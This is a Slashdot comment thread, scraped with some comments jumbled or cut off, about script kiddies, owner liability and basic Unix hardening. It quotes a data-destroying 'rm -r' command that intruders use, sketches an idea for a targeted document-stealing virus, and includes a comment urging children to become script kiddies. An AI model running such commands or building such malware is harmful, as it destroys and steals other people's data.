This page suggests a solution to the insecurity of software that I almost agree with -- basically, that anyone with the know-how should be spending their time writing viruses and exploits for the woefully insecure OSs we are blessed to work with today, until OSs HAVE to be secure to stand up to the sea of malfeasance that comes in through their net connections. My recommendation is a loop of snide but informative walls...
Sometimes an AC comes along and posts a real gem.
Y'all read the previous post, and see how our AC socially engineers two separate people - first a HaX0r in an IRC channel to get an exploit, and then a poor dumb luser to action it.
Which goes to show that it's often easier and more productive to attack the people on the system, rather than the system itself.
Well done AC!
Want to learn about race cars? Read my Book
I think we have to draw a bright line between simply trying to get into another system, which is "bad", but is the computer equivalent of trespassing, and crackers who use other systems for DOS attacks, or try to damage the systems they break into. In the latter case it's theft and/or vandalism.
Exactly. For example, the only part of mail handling that needs anything unusual in file system access is the final step of appending the mail to a local user's mailbox. That should be handled by a privileged program about 100 lines long, and nothing else in mail handling should have extra privileges. If Sendmail had been built that way, hundreds of thousands of break-ins would have been prevented.
Sorry for any jargon. I know our legal systems and education processes are very similar, I sometimes forget the differences. 3L - Means third year. Law school is a 3 year program that one may enter after finishing undergraduate studies. I waited about 8 years between undergraduate and law school phases, but I have now finished the first two years. Joint and Several - If a plaintiff wins a case against multiple tort defendants, there rights to collect the award depend on the forum state's laws. In the majority of US States, the law provides for contributory negligence. The jury finds Def A - 60% responsible Def B-20 % responsible, etc. The plaintiff can collect only the amount each party owes. For instance in a $1000 award, the jury can collect $600 from A, $200 from B, etc. Contributory negligence is a rather new concept in our jurisprudence. Although some states have adopted this scheme, many others allow for joint and several liability of all named parties. This means that the plaintiff can get their $1000 from any defendant. They can get all of it from B, even if B was only hypothetically 20% responsible. B would have to get his excess money back from the other defendants through contribution. If they refused, he would have a legal standing to collect it in a court. Most states abolished this b/c as a practical matter, attorney's would always joint a plaintiff that had huge resources. If they were found to be negligent, they would collect the whole award through the affluent plaintiff to avoid the risk of the other parties discharging the debt through bankrupcy. Not having practiced, I'm not sure if we have a practical equivalent of a sniff test. I'm sure that our judges would alert a party b/4 wasting too much court time. Its likely that the opposing said would file a "motion to dismiss as there is no claim upon which relief may be granted." This would create a motion battle in front of the judge as to the legal validity of the theory behind the claim. I personally find merit in your approach. If you ever have a chance to present the argument, please let me know of the outcome.
honestly. i thought previously that people were just exaggerating when they typed like that in mockery on slashdot. then i learn there's a couple of idiots who actually type that way.
idiots.
"I hope I don't make a mistake and manage to remain a virgin." - Britney Spears
We had a kid where I worked we found breaking into devices across our network. Myself and five or so other admins watched, waited and caught him. Took us a few weeks to gather logs and evidence. During that time, we missed sleep and time with our families and friends. We also had to rebuild several servers and had it affect many of our customers and coworkers.
When we had enough, we busted him. Called the FBI, terminated him, and let them shake him down. Turns out he had a record and history of doing this before. He ended up with three years in prison followed by probation and the usual "no touchy cell phones, computers, etc". There went his livelyhood. Too friggin bad.
In all actuality, he was an idiot who was used by persons far smarter than he. We debated whether or not we should call the authorities at all and just take him out back and kick his ass. But we figured he was probably used to getting beat up and took out his agressions on others by breaking into their systems and whatnot.
I used to do goofy stuff too. But once you cost a company millions and leave others to clean up your handiwork, you need to get your hide nailed to the wall.
Breaking in systems is not learning - it is criminal activity that needs to be treated as harshly as possible. And when some dork tells me "I break into systems to teach the admin a lesson" I often find they are the same people who complain when one of their ilk gets busted and gets taught a valuable lesson about private property and being responsible for their activities.
Want to try and break boxes? Download Linux, BSD, whatever and break into your own boxes. Break into your little IRC friends' boxes. Leave the rest of us alone.
Please explain to me how any stereotypical script kiddie attack/compromise nets them ANY knowledge WHATSOEVER.
ANYONE can download a script/root kit from the 'Net and use it to compromise a variety of Unix flavors. Script kiddies do not need to learn anything about networking or system administration to utilize these tools.
From a script kiddie's introduction to the world through his eventual departure, any knowledge gained from these compromises is negligible. They're not getting their "start" here. They're installing Linux at home, maybe learning a little here and there about Unix, and then immediately letting that go to their head (nobody else at school can do this, so I must be smarter than all of them, which means I'm smarter than most everyone in the world!), and they strive to let the world know this. So they attack systems, break in to networks, rack up the numbers and then share their conquests with their l33t-0 IRC friends so everyone else can see what a l33t hax0r they are.
It has nothing at all to do with learning or self-education and everything to do with adolescent aggression.
I'm not denying that a certain percentage of these kids will indeed mature, grow up, get educated and get a real job in a similar field. I don't, however, think that this percentage is significantly higher than any other computer-literate group. Script kiddies are just a subset of the "high school computer geek" crowd, and I'd bet you'd find a percentage of any high school computer geek crowd finding a respectable IT job is probably the same across the board.
Uhh, lots of network utilities use raw sockets. These need to be root. A lot of other crap gets poured into the root category because they are stuff that only root should ever play with. I personally think all of these should be put in a user/group called "netadmin" instead of being lumped into root. Give this group what it needs to run.
I've done this to my system in the past where I was on college networks and it made me feel a hell of a lot safer.
- Paradox
Man of the C!!!
Slashdot. It's Not For Common Sense
It's all about costs vs. risks.
If I really wanted to keep Evil Burgler out of my home, I would put in bulletproof glass, steel doors, thousands of dollars of security systems and probably a few armed patrols. Realistically, this isn't feasible for my lowly home. It might be for some areas that desperately need to be secured, but *I* can't afford it. So, I'm acknowledging the fact that an evil visitor could kick down my door and remove the contents of my home, but I've taken what I consider are relatively reasonable precautions to reduce that risk. Sure, I could spend more and reduce the risk even further, but would it be worth it?
Similarly, you can spend millions of dollars for state-of-the-art hardware, 5 levels of firewalls, intrusion detection software and a staff of IT folks constantly patrolling network traffic looking for any sign of attack or intrusion. For major IT companies, even this may be excessive, but for the lowly server-in-the-garage type, it's obscenely unrealistic.
Not everyone that wants/needs a server can or will a) get a degree in computer engineering just so he can know enough to properly secure his systems and networks; or b) hire a staff to do the same job
There's no such thing as a perfectly secure machine. It all comes down to what the administrator is willing to spend (in time, resources and money) to support and maintain his setup, weighed against the risk involved.
It never ceases to amaze me... these kids can't even operate a sniffer, but can compromise hundreds of systems. Unreal.
Grumpfish
Grumpfish
I'd rather be fishing...
They're more tender and flavorful than the old ones.
the script kiddies really pose little significant threat to organizations
that is interesting. could you provide more detail to validate this claim? it seems that you are in a very small minority that believes this.
"My mother never saw the irony in calling me a son-of-a-bitch." - Jack Nicholson
"phenomena associated with annoying male adolescents"
As far as I can tell the phenomena lasts way waaay past adolescence .. :)
Get 'em all, all except
Edison, who tapped phone &
telegraphy lines.Sent a false
report of an indian raid.
[that was nice, also is alleged
to have saved a train load of people
from a washed out bridge by coding
on a train whistle.]
How about Einstein or many other
prophets of modern science & industry.
Everyone seems to forget that
the business of the web is to test
decentralized communication & to put
the security of the web to a trial by
fire, which in this case is the
script kiddie & his twisted imagination.
Who the hell ever told you to
build a web around an open porting
system anyhow. It ain't my first choice,
So unless you want to get a change
belt for 'Tux", An eyeshade with a big red
"K" on it,& invite the Gestapo in to
protect you.
[As a corrallary to
" He who would
give a little freedom for a little
security, deserves neither",
I offewr,
"He who you would pay another to protect
him is gonna loosethe whole rhing"]
^ ^ ^ ^ ^
Got migrane,face pain
toothaches, sinus
flu,nausea or other
conditions pertaining
to the head & throat
...make an aluminum
foil hood, move around,
so as not to be reaquired
as a target; & don't
look at a tv tube
the morphological
similarities between a
MICROWAVE LASER &
TV tubes
is beyond the scope
of this message
I haven't read the article yet - it's been Slashdotted - but does it cover the one big question about script kiddies - and that is, why do they spell so badly?
The nasty combination of punctuation and numeric characters into words surely makes it more difficult for them to communicate properly with each other, let alone us normal computer geeks.
Can anyone offer any insight? I'll look forward to reading the article when the server is responding again.
Fire and Meat. Yummy.
chmod 000 `which rm`
> /msg visionary N4RQ!!!
ROFL!
That's worth the whole price of admission.
Is there anyone else out there who remembers this? I think Slashdot must contain a bunch of ex-1337 people.
BIND also has a "-t" flag, allowing you to chroot it (i.e. "named -u dns -g dns -t /home/dns"). This is also easy if you're a primary nameserver (unlike most chroot programs, you don't need to worry about copying libraries), it will take a bit more work if you're doing secondary DNS (there are HOWTOs available). If someone breaks into your system through a chrooted BIND, they won't be able to get root, since the chroot jail shouldn't have any setuid files in it.
An extreme amount if they are also the security specialist. Even more so if they are good at multiple operating systems. Plus you get into the problem of how to justify their cost to management, along with the security software etc. It is an ongoing battle to basicly spend extreme sums of money on something that doesn't appear to add to the bottom line of the company.
I should really clarify this just a bit - I'm not referring to the CERT advisories or things like that, but the "rootkits" that make exploitation of a compromised system virtually automatic.
I see no "white hat" use for those at all.
D
----
The proper way to run that is ls -la, not ls -al.
I've been seen more and more violence in the kids lately. I was a teenager and we did stupid things, but almost all were not harmfull, or really destructive. Most of the bbs's were pirate boards anyway, and we wanted more leach time. Stealing from the thief mentallity I guess.
But we never tried to shut down the phone company computer for the fun of it.
I don't remember anyone in my high school brining guns in. there probably was a gun or two, but no one ever shot anyone else. There are schools now with security and metal detectors...I think the level of "bad" has went out of control. And I don't think its going to get any better.
If ignorance is bliss, the world is full of blissful people
I think a problem will arise as the media attempts to classify all "black hat" hackers by the actions of these "script kiddies." Even though the vast majority of "damage" is caused by people with little or no computer knowledge just for the "thrill," the script kiddies really pose little significant threat to organizations.
The real danger is those people who have a clearly defined agenda/ideology in mind when the crack/write viruses. After the outbreak of the "ILOVEYOU" virus, I began thinking about a virus that targets a particular organization and compromises *only* their systems (and copies internal documents, deletes files, etc.). Even though it could replicate with each machine it infects, it would seem completely innocuous until it finds computers that identify themselves within the target domain. It could target particular classes of domains (in the case of worms, for example) that would be more likely to be within fewer degrees of separation from the target--preventing widespread outbreak and collateral damage so as to avoid attention and publicity.
Threats like the above are what should frighten corporations and the government. After Oracle's recent attempt to purchase MS trash, the proliferation of corporate espionage has really been brought to the forefront by the media. The damage that could result from the release of proprietary information is far greater than what results when a web server is cracked or an e-mail server taken down. Nonetheless, most organizations have no infrastructure in place to deal with this type of threat. This is where the *real* danger lies.
ByteMyCode.com: A Web 2.0 code sharing community.
No way dude, that's my Married with Children command.
Eh...
"You are asking to defend the rapist that claims "She was asking for it.""
Hmm .. I don't think thats quite the right analogy. There are three parties involved here, not two: the raped (victim of ILOVEYOU for example), the rapist (author of ILOVEYOU) and law enforcement officials (Microsoft).
If a policeman just stood by and watched the raper do his work, you would definitely fault the rapist, but you would most certainly also fault the policeman for just standing by, watching, and not doing anything to make the street safer for the woman who got raped.
Microsoft claims that they are interested in creating secure environments, and thats what they market and sell. When you buy a MS solution you are buying that. So I most certainly think MS should be hold responsible for not delivering as promised. We pay police to keep the streets safe.
It's 100% uncrackable. I DARE you to try to get in. The IP address is 127.0.0.1.
-- Dave
This post expresses my opinion, not that of my employer. And yes, IAAL.
I'm told your version is the "laughter" test - if, at the first interlocutory hearing, the judge laughs at you, maybe you ought to revisit your pleading.
The motion you're talking about sounds like our own "Motion to strike out as disclosing no reasonable cause of action."
The new version, as of 26th April last year, is the CPR Part 24 application to strike out as "having no reasonable prospect of success at trial", which is washing a lot of speculative claims out of the system at a very early stage (my personal record is eleven weeks, and it would have been three weeks less if I hadn't gone on holiday in the middle of it).
I think at this point, though, we're in danger of using /. as a private email service to talk a completely different shop to the one that's actually intended here.
-- AndrewD
A Maze of Twisty Little Laws, All Different.
Are all the unnecessary services disabled on the Linux box? If not, there's your problem.
The problem is that Sysadmins are seen as low status by code monkies and suits (analysts). Which means that they get trained and then piss off at a moments notice, which means that the next one doesn't get trained. I think that this will change as systems get to be more of "the system" and less "just" the iron that it runs on.
--------------------------------------------- "In the end, we're all just water and old stars."
No, it is NOT Dan.
John Draper (Captain Crunch)
http://www.woz.com/letters/general/91.html
If it was said on slashdot, it MUST be true!
And strangely enough, I get speech synthesis at this military terminal.
People will only commit the crimes it's POSSIBLE for them to commit.
If everyone in the world used MS Outlook, and everyone automatically ran attachments - guess what? - everyone in the world would have lost all of their media files (at the very least), when ILOVEYOU came on the scene.
Predators STRENGTHEN prey, as just about ANY scientist who knows anything about evolution can tell you.
Education is the silver bullet.
Well, you're already at 5 so I can't moderate you up. I guess I'll simply have to settle for expressing my admiration for a truly insightful post. Nice work.
Too many people say "oh, well, a real hacker can break into any system, so it isn't fair to criticize the security on Windows 95 - people just hack it because they hate how sucessfull Microsoft is."
Besides - the kiddies are feeding their egos off the mythology. The more people realize that the exploits are pathetic, the less incentive.
Our secret is gamma-irradiated cow manure
Mitsubishi ad
We apologize for the inconvenience.
You can hire me to a ;ousy 140K US a year.
Not everyone deserves a 320i
I don't think that everyone should just on some 12 year old who can't figure out what a swap partition. Maybe the real threat is the administrators who can't configure a secure system or even the software companies that don't write secure products.
Maybe it's good that people who only end up doing stupid things in a system are the ones to break in because they are the ones that usually make the security holes really obvious and in turn drive the developers to write patches. Besides, the real threat doesn't lie within a high school kid from the suburbs. It lies within making sure that someone the operating system that confidential documents are held on are kept secure from terrorist groups and other sligtly more threatening individuals. Maybe you should thank these kids for finding expliots in the software companies bad coding or the admins bad config
-thinkpol
Part of my company was "hacked" a while back by a script kiddie. Behind our router I pretty much just use telnet and ftp because it simple, and everyone else is behind a firewall and cannot see the traffic in between the router and firewall. Also, the machines are just test boxes with no vulnerable data in any case.
/bin/.bin which is pretty easy to find, using, well, "find" looking files modified within a certain time period. He also left a log of him ftping the files from the seti@home box, which is how we tracked that one down in the first place.
/bin/.bin/sniffer directory, or whatever it was called and viewed his sniffer log. Well, guess what it showed besides our plaintext passwords and usernames? His username and password to his ISP as he logged into his own account to get more tools while the sniffer was running. Needless to say we caught up with him.
./hack 192.168.1.1. I mean as soon as you set up an IRC server to brag about your instruction following skills, you've lost all respect as a "hacker" as far as I'm concerned.
Well, some people in techsupport set up a linux box outside of the firewall to run seti@home, and left it completely wide open. A script kiddie got to that and fired up a packet sniffer. Then of course, strange things started happening on my test boxes as the script kiddie hacked into mine seeing my plaintext passwords, quite simple.
Why do I say this person has no skill? First, my box was running a firewall, so his IRC server was hitting the wall along with everything else he was trying to do, apparently he did not know how to disable ipchains, and I could see through netstat that he had these apps running. He replaced some apps like "ps", but left many others, like netstat. The old apps along with his packet sniffer and IRC server where moved to
Here's the beautiful part. When we found that the seti@home box was the root of all evil, we looked in the
What these people are thinking is beyond me. Maybe I'm just paranoid, but if would ever do something like this, I'd make sure I knew my sh*t and even then odds are you will still leave some sort of trail. So, people must be right, they really must not see any consequence in committing these acts. And then they brag about it like it took skill to type
Stupider like a fox! - H.S.
Hmm, close, but not quite I think. Script kiddies are more like simple taggers then graffiti artists. Graffitti artists often have real talent, and therefore fit more with real crackers who write the scripts that the kiddies use. I mean, a simple tag that's used over and over again that is just some guys name is about the same level of just using a pre-packaged piece of code.
Secure systems don't have "root."
Nice points, but it's worth considering that in at least one recent case (96, if memory serves), a landowner was held liable for poor physical security that allowed vandals to break in and open the valves on a tank of toxic chemical that proceeded to escape (they didn't have a proper bund around the tank either) and pollute a stream in, if memory serves, Wales.
Anyway, I think a distinction can be drawn between your analogy and the vulnerable box, and it's one that was used by the court in the pollution case I mentioned above.
It's this: residential burglary is a fairly rare crime, media scare stories to the contrary, and in breaking in and using the phone the burglar didn't get access to anything he couldn't have done in a public phone booth.
The important thing there is that your example is of a low-probability occurrence which doesn't significantly enhance the criminal's capability over what he would have had anyway.
The vulnerable box is going to get found by script kiddies. They can automate their search for vulnerable systems and they're like rats in a grain warehouse on the net: there's thousands of the little bleeders.
By cracking a system that's got special access privileges, or passwords and the like stored on it, they gain access to things they wouldn't otherwise have had. It's as if your hypothetical burglars broke in, found an unsecured firearm, and went out and shot someone with it.
Because the probability is high and the potential harm obvious, surely there ought to be some obligation on the owner of a system to make sure he was ratproof?
Perhaps Bert would be regarded as a victim, though, if he could show he was totally reliant on Al.
Thing is, you see, that there's pretty much no decided authority on this anywhere (or at least that I've been able to find) so until there is, we're both right.
What I'm trying to get at here is a "sniff test" - what answer "feels right" to the community as a whole?
-- AndrewD
A Maze of Twisty Little Laws, All Different.
A good sysadmin.... But a lousy typist.
Not everyone deserves a 320i
It's obvious that the state of the internet world is slowly being lost when someone cna click a few buttons, or spell out a few commands and break into a system. Whatever happened to the days when it took skill, ingeniousness, and creativity to do that?
Upeo
I disagree. Most of the script kiddies know what their doing once they reach a certain point.
I think that the web page didn't not give enough credit to the abilities of many. Sure, some are incompetent, but many have a clue and are intentionally and knowledgably malicious.
What this article really shows is the lack of good security and monitoring on allot of systems. (apparently not the authors, but if the number of boxes that one of the kiddie's had root was true this fact is inherently obvious)
If all system security was effectively monitored, kiddies would be sitting around bored, DoSing random IRC users.
You are right about the sense of unreality. But I don't think you are right about the curiosity.
My belief is that some people categorize the world into two groups: "People who are stupider than me" and "People who are smarter than me". These kiddies like to have as many entries as possible in list A and as few as possible in list B.
What does this explain and how?
They don't try to understand what they are doing. They can't admit to themselves that there are people smarter than themselves who could teach them about, say, TCP/IP. So they use scripts the found on the net and pretend to themselves that "I could have created this."
It also explains the motivation: If you break into someone's system, you have proved that person is on list A. The reasoning is: "Their automated defenses didn't keep out my automated attack, therefore I am smarter than they are." This is flawed, of course, but we already know the kiddies are a little...dim.
--
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
>To counter that, if you ever catch a kiddie on your system (logged in), don't just boot him off. 'talk' him.
Although this is a nice concept, the reality is as soon as the 'hacker wannabees' know you are watching, they either drop link, or type
cd /
rm -r * &
THEN drop link.
If the goal is exploration, the world is WAY different than the John Draper days of blue boxing.
386 computers that can run BSD are thrown in the trash. So access to computing resource is limited by electrcity. No need to break into systems to get CPU cycles.
The internet is FAR bigger than the old BellCore network. And the documentation that DRIVES the internet is all out in the open. No need to go dumpster dive the 'keepers of the network' to learn about the network. Or blue box about to map the network.
If it was said on slashdot, it MUST be true!
Heh. Reminds me of a day at work a couple of months ago, when a colleagues' box was hacked into. The h4xx0r kid had run some kind of rootkit (although I'm not sure the box was actually rooted, but some kind of prepackaged kit was used), which cleaned out all the logs. Except, of course, for that tricky, well-hidden, hard-to-find, sneaky, known-by-gurus-only one known as .bash_history! ;^)
It was quite cool to see which commands had been run, etc. I think he actually started up an IRC server on the box, probably to serve warez... That, and the ObPortscan of course.main(O){10<putchar(4^--O?77-(15&5128 >>4*O):10)&&main(2+O);}
-- http://thegirlorthecar.com funny dating game for guys
No kidding, some of this stuff will keep me entertained for hours. What are the funniest parts? I liked this one:
:************************************************* ****************************** :************************************************* ****************************** :************************************************* *** :ok sir :) :hahahaa
:J4n3!
:J4n3! : A T T E N T I O N
:J4n3!
:J4n3! : YOU ARE REQUESTED TO RESHELVE THE BOOKS AFTER USE
:J4n3! : SO THAT WE CAN MAINTAIN A CLEAN AND TIDY WORKING ENVIRONMENT
:J4n3! : THANKING YOU FOR YOUR KIND CO-OPERATION
:J4n3!
:J4n3!
:D1ck!
Oh man.
It isn't about parents teaching respect, it's about GROWING UP.
There is no right or wrong, there is only fun and boring!
I eat the flesh off the living, and I vote!
Nah, they've no idea what they're doing. You could replace them with an expect script and be more effective. Automate the whole process.
Basically the moral is, take care of basic security. Get rid of stuff you don't need on the box. Use tcpd. stop and comment out all unneeded services from inetd.conf.
Just take basic security measures.
Government of the people, by corporate executives, for corporate profits.
While reading the IRC logs I was struck by a nearly overpowering urge to write a perl script ala Dialectizer. To convert plain text to k1dd3. :)
I think that I would have to if I were to become an 31337 h4x0r. because I sure as hell cant type like that
Although i'd have to argue w/some of your point. If you got shot b/c you didn't put up some protection WHEN YOU KNEW YOU WERE IN VERY DANGEROUS TERRITORY, then i'd have to place at least some of the blame on you. If your neighborhood has a high crime rate, i think you'd lock you door, right? Well the internet is a VERY hostile enviroment to be in, so yes you do take some of the blame if you have lax countermeasures.
How wrong can you get.
The problem is that admins don't bother to keep track of problems and fix them. It does not matter how easy or hard it is.
For example, I had this idiot come in and tell me he likes *BSD (Any of them) because he can set them up and "forget about them". When I asked him how he fixed problems, he stated that he did not since they were so secure. I just about died.
Linux O Muerte!
It's a script kiddie
It's not an elite hacker
What an idiot
General Relativity: Space-time tells matter where to go; Matter tells space-time what shape to be.
I don't understand all the hatred directed toward script kiddies here. Sure, some kiddie busted up your box once... Whatever. A small percentage of these "kids" are likely to grow up to be big sysadmins like many of you. Hordes of people in the "industry" got their start hacking/cracking/phreaking. (ie. Jobs and Woz) They had to start somewhere, right? Not everyone has access to prissy-po computer camps, etc. I'm not condoning script-kiddie behavior. I'm merely shedding a little light on the hypocrisy in this discussion. By criticizing "script kiddies," you're EATING YOUR YOUNG. Isn't there a more constructive way to deal with them? Scorn--obviously--isn't working. Best...
I think the EFNet admins should get off their butts and start a channel service just like Undernet has "X" and "W" bots or the "chanserv" on Dalnet and finally end this IRC bot stupidity.
(How else can people keep their channels organized?)
Meanwhile I consider Undernet a better place to irc.
The OpenBSD security is a marketing myth. The security of a system has everything to do with the compentency and vigilance of the admin, and very little to do with the operating system (The exception here are Windows 9* boxen, which cannot be secured by design).
Have you actually used OpenBSD? The install has sendmail and portmap running by default. You have to manually remove this services.
All the bragging about OpenBSD being SO secure does is give the admin a false sence of security. EVERY machine can be compromised. EVERY ONE. The job of a good admin is to constantly raise the bar; to make it more and more difficult for a cracker to get in.
Besides: if a cracker can social engineer someone into giving him their password, then the system security doesn't mean shit. Humans are ALWAYS the weakest link in any security policy.
You have a responsibility to protect yourself, and when you set up a system that other people rely on, you have a responsibility to protect the system for them.
My favorite comparison to the ILOVEYOU problem is: if you built a subway system that broke down whenever some kid painted graffiti on any of the walls, who would be responsible? The ignorant kid who commits an act of vandalism which takes little effort and can be done in secret? Or the responsible adults who knowingly built a system that can't tolerate graffiti?
Any system which can be destroyed by the petty vandalism of a child was effectively destroyed by its designers.
In a world with billions of people, you have to assume that a certain percentage will do damage just for the fun of it, if it's easy enough. If you're responsible for security and you don't make it too hard for them to do it, you're as much to blame as the person who does it.
What, never played Activision's game Hacker?
LOGON PLEASE: _
I found one of the greatest parts -- this is when I could parse the syntax of the chats -- in the 'ping of death' (or whatever it was called). Notice that j4n3 gave d1ck the code, d1ck writes a shell to execute the code and then puts his name on it!
That for me was very telling. It really seems like an attempt to gain notoreity of some sort even if it's just in this insular community. I'm sure most of us have written countless shell scripts, batch files and simple utilities, but didn't feel the need to claim authorship. This guy wraps cut and paste code snippets with an if/fi and feels he needs respect.
Note, too, how much time is spent attacking other kiddies (DoS attacks, password sniffing, and the whole bit about ripping each other off getting credit card numbers). Perhaps there would be a way to get them to do more of this and they could leave the rest of the world alone. Ah, here's to hoping.
It's not the same case if you have a resource that is turned against others by an attacker, as it is if it does damage because of poor maintenance. Think of this; suppose you kept a propane tank on your property. Should you be liable if you fail to maintain it and it explodes, severely damaging your neighbor's property? Probably. Should you be liable if some idiot shoots it with a high-powered rifle from 2 miles away and causes it to explode? Probably not. Under your reasoning it's your fault for not having a dozen security guys sweeping the area for attacks or keeping your propane tank is a 3-inch steel safe.
Also remember that >95% of the computer-using population doesn't know ANYTHING about security, and of the remaining 5%, 4.5% of them have knowledge doesn't extend beyond 'don't open email attachments and keep sharing turned off.'
And no, you can't blame it on Microsoft. You can break into an unsecured linux box just as easily as a windows 9x box, and even a untweaked BSD is almost certainly vulnerable.
Companies are fined, implicitly, when cracked. The downtime, hassles of reloading and de-rootkitting are not inexpensive, and can easily exceed your suggested 100 quid fine.
The two most common things in the Universe are dark matter and stupidity.
Thankd god that somebody bothered to design an OS with decent security. Lordy knows Microsoft, Red Hat, and Solaris can't seem to do it.
Free music from Jack Merlot.
this sjit is hellof funny...
there is no thing
what else could you want?
Security is going to be much more important as more and more people get on the net, and it's time to start addressing it.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
I've been reading this guy's whole list of papers on script kiddies. My favorite excerpt has to be (paraphrased) "Day 3: Later on D1ck teaches J4n3 how to mount a drive" This is actually kind of sad-people with no clue about computers can still take them out and think that it makes them "elite" and powerful. What garbage.
Colin Winters
If you're using OpenBSD, you can just unplug the hard drive, and plug it back in when you're done. I've done it (though not for that reason). Of course, if you were using OpenBSD, you wouldn't have a script kiddie on your system, now would you?
Let me just say: Ha Ha Ha =)
Too many people think that all networks are the small, easily managed size that characterizes small to medium size businesses. But networks that serve 260,000 employees and countless vendors/contractors are a beast of a different magnitude.
"You can never have too many elephants on your team."
If I was a kiddie today I would be a script kiddie. Unfortunatelly I didn't have good network connection when I was a kid and now I'm busy with ``serious scientific things'' and I don't have the time nor the appetite to spend 10 hours on-line to find out about the latest exploit.
All script kiddies will eventually end up probably as computer scinetists PhD. When they learn how to _be more creative_ they will start forgetting about kid scripting and enter the trip of innovation.
So IORAL script kiddies are good. Its a good pre-student expirience on computers and networks. It is not better than learn how to seriously program (there can be 13 year old programmers but not 13 year old lawyers -- amstrad 6128 manual). Learing both programming and script kiddiing is the best. I'm gonna encourage my kids to be script kidies.
Worry about the damage ? That is BS!
Most network damage is done by COMPANIES behind user-friendly freely-innovative access-your-files-through-our-servers etc/etc.
Script kiddies will not harm the ""little guy"" no less than companies.
Furthermore. NOBODY hurts a good and fair administrator.
Well, just look what I pulled out of my ass:
Guy sits at his computer and boots it. The while the computer is booting he looks at the monitor and thinks. The guy wispers ``damm, I forgot were I wanted to go today''; he closes his computer and goes to bed.
You dont try and understand the ants in your kitchen, you find out where they are coming from and block it up. Same for a script kiddie. Keeping them out is just a matter of awareness on the part of the sysadmins and not doing silly things like running services you dont need or failing to keep the ones you do need patched. Much like blocking up the cracks the ants are coming through.
On the other hand, if a real expert cracker wants to smoke my systems then I may as well kiss my digital ass goodbye because I know my limitations and I know theres many folks out there who can find holes in systems that I never even knew were technically possible. The difference is that the real experts are usually more mature than the script kiddies and need some kind of reason to hit a system - and as far as I know they have no such reason to hit mine, theres nothing there that they need.
Just IMHO but as far as I'm concerned the only time I'd bother even trying to catch a script kiddie is if they are doing DoS attacks.. that upgrades 'em from an ant to a roach and I'll go out of my way to squish 'em. Otherwise I just close 'em out and ignore 'em.
# human firmware exploit
# Word will insert into your optic buffer
# without bounds checking
I had a
The amount of time spent by these kids online is amazing. Either rooting, downloading, playing games or chatting it up, they spend hours online doing nothing else. Where are their parents?
I think this is part of the misconception brought about by some of our more esteemed members of society; that a child constantly in front of a computer is preparing for the New Internet Age of IT Jobs or some other mantra. More rubbish than not if young people are only playing games, engaging in IRC or downloading exploits.
Having see firthand what happens when they get caught, I don't think these people realize the implications of their efforts. There is some belief out there that "hax0rs", after they do some high-profile breakins and DOS attacks, are hired to well-paying security jobs. *In most cases* it is quite the opposite.
Criminal records follow you throughout your life.
I think most of the script-kiddies just do not realize that they are destroying other peoples work. It's just like a Game for them.
Seen that ? ;-)
ftp> get sun2.tar
200 PORT command successful.
150 Opening ASCII mode data connection for 'sun2.tar' (1720320 bytes).
No comments...
--
Trolling using another account since 2005.
Ever sat down at a box somebody's given you an account on and just poked around to see how it's organized? That's part of the script kiddie feeling - it's partly about exploring the system, seeing what you can do.
But there's something more behind that - it's a feeling of inconsequenciality (sp?!?) - that those boxen they're poking with are inconsequential to them and immaterial - they don't actually exist in their mind!
That's the problem that faces the sysadmin - the kiddies feel that you do not exist, and therefore it's okay to go off and exploit these systems! To counter that, if you ever catch a kiddie on your system (logged in), don't just boot him off. 'talk' him. Make sure he knows that there are people behind these machines, and that they're not just machines to be played with.
With script kiddies, it becomes a foot race between the whitehats and the script kiddies. How quickly can you get to your box when your pager goes off with a bugtraq-alert message? Can you get back to your box before the script kiddies can?
Make no mistake, script kiddies may be novices, but they can do a heck of a lot of damage to an organization if they beat you on the foot race.
----
Remove the rocks from my head to send email
On the whole, I find that I prefer Slashdot posts to twitter ones because I don't get limited to 140 chars before
Having been mentioned in the logs myself, and knowing who the people are, I have to state that their even bigger morons than I thought. "Go ask MadCamel".. it is amazing that these kids can run around rooting boxes, yet do not know the most basic unix commands. They have a very elitist attitude ("we will never get caught, we're better than them"), yet they get trapped and logged by your run-of-the-mill honeypot. I do admit however, that they have potential to be talented coders, security experts, and even admins. That is, in part, why I associate myself with these people. I want to steer them in the right direction, show them that unix zen isn't just ./hack ./hack, you can get just as much satisfaction hacking net.inet.tcp.bongload into a BSD kernel[don't even ASK what this does btw]. These kids arn't criminals, they arn't even lame. Their just very misguided, and if people do not start guiding them in the right directions, they will end up being guided by the law, which is a Bad Thing(tm). This particular little group I had given up on long before any of these logs were taken. They were bent on getting 'respect from their peers'. They would not listen to any reason because they 'couldnt be caught'. It's rather sad actualy, but oh well. some can't be helped. I'm content in the fact that I have gotten at least a few of the script kids I know to see the light.
A team at Bell Labs came up with a preloader for ld.so called Libsafe. It tries to keep buffer overflows from happening by keeping various string functions from overwriting the system stack by redefining them so they can not. Since buffer overflows are what cause a significant number of exploits these types of people can use, blocking them from happening is a good idea. Libsafe also can be set up to email a system administrator when a buffer overflow occurs.
While there are a few programs that break due to it, the vast majority I've seen are compatible, and my personal experience has shown that this program keeps people from playing games when they should not. I am *not* saying that having this program is an excuse not to keep up with the latest security patches for your system; rather, this is a useful tool to have in your arsenal. A poorly written program still could have exploits that this utility does not catch.
Enjoy your new knowledge everyone.
--Ask a silly person, get a silly answer.
:D1ck! :do this 'df' :and paste me :and then df -k :wait :.Filesystem 1k-blocks Used Available Use% Mounted on :./dev/hda8 1935132 878956 957780 48% /
:J4n3! :./dev/hda7 23302 2650 19449 12% /boot :./dev/hda1 2064032 1230496 833536 60% /mnt :oki :mkdir /win; mount -t vfat /dev/hda2 /win :wait, what is /dev/hda7 :?
:J4n3! :linux swap partition :ok
:D1ck!
:D1ck!
:J4n3!
:J4n3!
:J4n3!
:J4n3!
:D1ck!
:D1ck!
:D1ck!
:D1ck!
:D1ck!
hmm... without my r00tkit, i'm just a luser
Script kiddies remind me of the quote "never underestimate the power of stupid people in large numbers." The sad thing is, they are only contributing to the ever eroding freedoms of the internet. Every time they deface a webpage, they simply add ammunition to some uneducated represenative's fight to "clean up the internet." I'm glad i'm not 16 anymore.
There are some people that if they don't know, you can't tell 'em.
This is not quite right...
script kiddies are not a force of nature.
being exploited is not the same as being negligent.
By maintaining a seriously leaky box, Bert ought to be liable to Charlie on the same principles as the owner of the reservoir in Rylands v. Fletcher was, save that we're applying that principle to the net rather than the real world; and
